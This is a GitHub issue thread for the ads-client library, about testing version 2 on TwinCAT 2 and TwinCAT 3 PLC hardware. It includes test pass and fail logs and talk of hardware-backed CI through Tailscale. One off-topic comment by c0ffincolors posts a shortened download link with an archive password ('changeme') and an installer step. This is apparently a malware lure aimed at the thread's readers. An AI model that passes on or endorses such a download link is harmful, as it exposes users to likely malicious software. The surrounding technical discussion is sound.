jisotalo/ads-client #147: Version 2 - Testing with TwinCAT 2 & TwinCAT 3 hardware

jisotalo, 2024-08-27:
Testing with real PLC hardware before releasing v2 stable.

c0ffincolors, 2024-08-27:
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

jisotalo, 2024-09-27:
Tests 100% successful with 64 bit TwinCAT 3 PLC (4022.27)

jisotalo, 2024-09-27:
Tests 100% successful with 64 bit TwinCAT 3 PLC (4024.62)

jisotalo, 2024-09-28:
Created separate test suite for TwinCAT 2 and now it's passing 100%. 

Tested with CX9020 (WinCE) with TwinCAT 2.11.231.

jisotalo, 2024-11-03:
Tested with 4026.11 running on laptop. There were few issues:
```
Test Suites: 1 failed, 1 total                                                                           
Tests:       7 failed, 216 passed, 223 total    
```

RPC methods didn't work:
```
  remote procedure calls (RPC methods)                                                                   
    × calling a RPC method (10 ms)                                                                       
    × calling a RPC method with struct parameters (10 ms)                                                
    × calling a RPC method without return value and without parameters (11 ms)  
```

Some issues reading data types
```
 symbols and data types                                                                                 
    √ reading upload info (7 ms)                                                                         
    × reading all symbols (52 ms)                                                                        
    × reading single symbol information (3 ms)                                                           
    × reading all data type information (93 ms)
    × reading single data type information (57 ms)  
```

crishoj, 2024-11-03:
Following up on https://github.com/jisotalo/ads-client/issues/159#issuecomment-2453318025:

> do you happen to have a TC3 4026 available

I'm pretty sure our IPCs are running TC3 4026. Let me check tomorrow if we have a spare one I can use for testing. (In my usual development workflow I use XAR on a PC as target.)

What would I need to install/run on the PLC for testing?

crishoj, 2024-11-04:
> do you happen to have a TC3 4026 available

Sorry, we are using TC3 4024 still.

> What would I need to install/run on the PLC for testing?

Testing procedures are of course documented: https://github.com/jisotalo/ads-client/tree/v2-dev?tab=readme-ov-file#library-testing

jisotalo, 2024-11-05:
Thanks @crishoj! I have the same issue. Perhaps I will try to install 4026 to some device.

jisotalo, 2024-11-24:
Current status of failing tests in TC 3.1.4026. The following fail:

```                                                                       
symbols and data types                                                                                                                  
    × reading all data type information (78 ms)     
remote procedure calls (RPC methods)                                                                                         
    × calling a RPC method (8 ms)                                                                                              
    × calling a RPC method with struct parameters (6 ms)                                                                       
    × calling a RPC method without return value and without parameters (9 ms)           
```

jisotalo, 2024-11-24:
That was easy!

Tests 100% successful with 64 bit TwinCAT 3 PLC running on development PC (4026.11)

closed 2024-11-24 by jisotalo

crishoj, 2024-11-24:
Great.

By the way, I will have a TC3 4026 system on a NUC some time this coming week. 

I'm contemplating to keep it running and expose it to GitHub actions using https://tailscale.com. The idea is to be able to run tests against hardware in CI. Perhaps an interesting option for ads-client as well.

jisotalo, 2024-11-24:
That sounds interesting. Let me know how it's going

crishoj, 2024-11-27:
While remote ADS connections between Tailscale nodes works well, connecting from a GitHub action runner seems challenging: The Tailscale [Github action](https://tailscale.com/kb/1276/tailscale-github-action) uses [ephemeral nodes](https://tailscale.com/kb/1111/ephemeral-nodes), which receive a new IP on each run:

> Ephemeral nodes differ from regular nodes in a few ways:
> - They are auto-removed from your network after a short period of inactivity. The next time an ephemeral node is created, it will have a new IP address.

As I understand, a fixed IP is required for the ADS route.

Perhaps a self-hosted GitHub action runner could be the way to go.